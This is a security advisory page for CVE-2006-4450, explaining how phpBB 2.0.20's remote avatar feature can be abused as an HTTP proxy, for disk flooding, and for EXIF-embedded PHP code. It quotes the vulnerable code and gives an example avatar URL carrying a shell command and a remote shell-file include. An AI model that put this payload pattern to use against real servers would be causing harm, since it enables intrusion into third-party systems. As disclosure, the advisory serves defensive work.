|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 1470 CVE : CVE-2006-4450 SecurityRisk : Medium  (About) Remote Exploit : Yes Local Exploit : No Exploit Given : Yes Credit : rgod Published : 31.08.2006
Advisory Text : PHPBB 2.0.20 multiple issues with avatars some problems persistently lie in the way it handles remote and uploaded avatars: a remote user can: (1) saturate the server with unuseful files, 'cause phpbb do not delete the previous one when you upload a new avatar (2) use PhpBB installations to launch exploits against other servers, using "avatarurl" argument when you modify your profile as path of a GET request. Look usercp_avatar.php near lines 125-153: ... if ( $avatar_mode == 'remote' && preg_match('/^(http://)?([w-.]+):?([0-9]*)/(.*)$/', $avatar_filename, $url_ary) ) { if ( empty($url_ary[4]) ) { $error = true; $error_msg = ( !empty($error_msg) ) ? $error_msg . '<br />' . $lang['Incomplete_URL'] : $lang['Incomplete_URL']; return; } $base_get = '/' . $url_ary[4]; $port = ( !empty($url_ary[3]) ) ? $url_ary[3] : 80; if ( !($fsock = <img src="/imgs/at.gif" border=0 align=middle>fsockopen($url_ary[2], $port, $errno, $errstr)) ) { $error = true; $error_msg = ( !empty($error_msg) ) ? $error_msg . '<br />' . $lang['No_connection_URL'] : $lang['No_connection_URL']; return; } <img src="/imgs/at.gif" border=0 align=middle>fputs($fsock, "GET $base_get HTTP/1.1rn"); <img src="/imgs/at.gif" border=0 align=middle>fputs($fsock, "HOST: " . $url_ary[2] . "rn"); <img src="/imgs/at.gif" border=0 align=middle>fputs($fsock, "Connection: closernrn"); unset($avatar_data); while( !<img src="/imgs/at.gif" border=0 align=middle>feof($fsock) ) { $avatar_data .= <img src="/imgs/at.gif" border=0 align=middle>fread($fsock, $board_config['avatar_filesize']); } <img src="/imgs/at.gif" border=0 align=middle>fclose($fsock); ... phpbb do not check if the user supplied value ends with an image extension, neither checks if the supplied string contains "&" and "?" chars. So, you can submit a value like this: http://some_vulnerable.host/somescript.php?cmd=ls%20-la&xpl=http://somehost /someshell.txt phpbb will launch a GET request like this: GET /somescript.php?cmd=ls%20-la&xpl=http://somehost/someshell.txt HTTP/1.0 HOST: some_vulnerable.host Connection: close obviously you have no output, but this makes phpbb to be like a http proxy (3) inject some php code inside jpeg files as EXIF metadata content: this, in combinations with third party vulnerable code can be used to compromise the server where PHP is installed. Should be enough to check for php code inside the temporary files before to copy the new avatar in "images/avatars/" folder. rgod --------------------------------------------------------------------------- ------ mail: rgod [at] autistici [dot] org site: http://retrogod.altervista.org  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
Multiple Vendors libc/gdtoa printf(3) Array Overrun
SecurityReason realised new advisory about vulnerabilities libc/gdtoa... |
||
| Apache |  |
|
» Apache Tomcat |
||
» Apache Tomcat User |
||
| PHP | |
|
» PHP |
||
- 2009-05-30| Copyright © SecurityReason.com. All Rights Reserved. |